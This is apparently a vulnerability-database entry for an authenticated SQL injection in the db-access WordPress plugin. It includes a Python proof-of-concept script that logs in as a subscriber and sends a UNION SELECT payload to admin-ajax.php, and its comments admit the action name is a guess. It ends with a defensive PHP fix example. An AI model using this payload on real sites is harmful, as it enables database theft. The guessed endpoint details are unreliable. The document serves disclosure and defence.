Security Vulnerability Report
CVE-2025-13000 CVSS 7.7 HIGH

CVE-2025-13000

Published: 2025-12-02 06:15:45
Last Modified: 2026-01-30 20:42:11

Description

The db-access WordPress plugin through version 0.8.7 performs no authorization check in one of its AJAX actions, so any authenticated user, including a subscriber-level account, can reach the handler and perform SQL injection (CWE-89) against the site's database.

CVSS Details

CVSS Score: 7.7
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
Vector breakdown: Attack Vector Network, Attack Complexity Low, Privileges Required Low, User Interaction None, Scope Changed, Confidentiality High, Integrity None, Availability None (exploitability 3.1, impact 4.0)
Weakness: CWE-89 (SQL Injection)

Configurations (Affected Products)

cpe:2.3:a:jimbob1953:db-access:*:*:*:*:*:wordpress:*:* - VULNERABLE
db-access WordPress plugin <= 0.8.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import sys

# CVE-2025-13000 PoC - WordPress db-access Plugin SQL Injection
# Target: WordPress site with db-access plugin <= 0.8.7
# Authentication required: Any authenticated user (subscriber+)

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "subscriber_user"
PASSWORD = "user_password"


def get_wp_session():
    """Authenticate and get WordPress session"""
    session = requests.Session()
    login_url = f"{TARGET_URL}/wp-login.php"
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'testcookie': '1'
    }
    session.post(login_url, data=login_data)
    return session


def exploit_sqli(session):
    """Exploit the SQL injection vulnerability in AJAX endpoint"""
    ajax_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"

    # SQL Injection payload - extracts database version
    # The vulnerable parameter depends on the actual plugin implementation
    payload = {
        'action': 'db_access_query',  # Example action name
        'query': "1' UNION SELECT 1,2,version(),4,5-- -",
    }

    try:
        response = session.post(ajax_url, data=payload, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request sent successfully")
            print(f"[+] Response: {response.text[:500]}")
            return response.text
        else:
            print(f"[-] Request failed with status: {response.status_code}")
            return None
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return None


def main():
    print("[*] CVE-2025-13000 - WordPress db-access Plugin SQL Injection")
    print("[*] Target:", TARGET_URL)
    session = get_wp_session()
    exploit_sqli(session)


if __name__ == "__main__":
    main()
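The advisory names two distinct defects: the AJAX action is reachable by any logged-in user, and the value it receives ends up in a query unparameterised. The following is an added example of a WordPress AJAX handler that closes both gaps; it is not code from the db-access plugin or from this report, and the hook name (`dbx_lookup`), the capability required (`manage_options`), the nonce action and the `post_id` parameter are all assumptions chosen for illustration.

```php
<?php
// Added example, not the db-access plugin's code. Shows a WordPress AJAX
// handler with the three controls the advisory implies are missing:
// CSRF nonce, capability check, and parameterised SQL.
// Hook name, capability, nonce action and parameter name are assumptions.

// Only 'wp_ajax_' is registered, never 'wp_ajax_nopriv_', so unauthenticated
// requests to admin-ajax.php get no handler at all for this action.
add_action( 'wp_ajax_dbx_lookup', 'dbx_lookup_handler' );

function dbx_lookup_handler() {
    global $wpdb;

    // 1. CSRF: the request must carry a nonce minted with
    //    wp_create_nonce( 'dbx_lookup' ) in the '_ajax_nonce' field.
    //    On failure check_ajax_referer() dies with HTTP 403.
    check_ajax_referer( 'dbx_lookup', '_ajax_nonce' );

    // 2. Authorization: being logged in is not enough. A subscriber reaches
    //    the wp_ajax_ hook but fails this capability check.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // 3. Input validation: coerce the parameter to the type the query expects.
    $post_id = isset( $_POST['post_id'] ) ? absint( wp_unslash( $_POST['post_id'] ) ) : 0;
    if ( 0 === $post_id ) {
        wp_send_json_error( array( 'message' => 'invalid post_id' ), 400 );
    }

    // 4. Parameterised SQL: $wpdb->prepare() binds %d and %s, so a string
    //    such as "1' UNION SELECT ..." is never interpreted as SQL.
    $sql = $wpdb->prepare(
        "SELECT ID, post_title FROM {$wpdb->posts} WHERE ID = %d AND post_status = %s",
        $post_id,
        'publish'
    );
    $rows = $wpdb->get_results( $sql, ARRAY_A );

    wp_send_json_success( $rows );
}
```

The order of the checks matters for defence in depth: the nonce and capability checks reject a subscriber before any database access happens, and `$wpdb->prepare()` ensures that even a caller who passes those checks cannot alter the query structure. When reviewing a plugin for this class of bug, the quickest check is to list every `wp_ajax_` / `wp_ajax_nopriv_` registration and confirm each callback has a `current_user_can()` call and builds its SQL only through `prepare()`.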

References

https://wpscan.com/vulnerability/aec53f87-6500-4c8a-925a-146be61bbabf/ (Exploit, Third Party Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13000", "sourceIdentifier": "[email protected]", "published": "2025-12-02T06:15:45.160", "lastModified": "2026-01-30T20:42:11.060", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The db-access WordPress plugin through 0.8.7 does not have authorization in an AJAX action, allowing any authenticated users, such as subscriber to perform SQLI attacks"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 4.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:jimbob1953:db-access:*:*:*:*:*:wordpress:*:*", "versionEndIncluding": "0.8.7", "matchCriteriaId": "A8E87533-7D7F-41D2-88D9-1C6E68B8C5C8"}]}]}], "references": [{"url": "https://wpscan.com/vulnerability/aec53f87-6500-4c8a-925a-146be61bbabf/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}